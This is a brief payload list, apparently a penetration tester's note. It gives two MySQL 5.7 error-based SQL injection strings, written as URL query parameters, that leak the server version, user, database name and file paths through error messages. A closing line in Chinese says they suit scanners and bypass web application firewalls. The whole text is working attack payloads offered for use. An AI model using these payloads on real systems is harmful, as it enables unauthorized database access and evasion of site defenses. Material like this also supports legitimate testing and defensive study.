MySQL 5.7.X Error based injection:
?id=JSON_ARRAY_APPEND(concat(0x414b3438,0x09,@@version,0x09,user(),0x09,database()),1,1)
?id='%26ST_AsText(ST_LongFromGeoHash(concat(0x414b3438,0x09,@@character_sets_dir,0x09,@@log_bin_index)))%26'
适用于扫描器, 可绕过Waf探测基于显错型注入。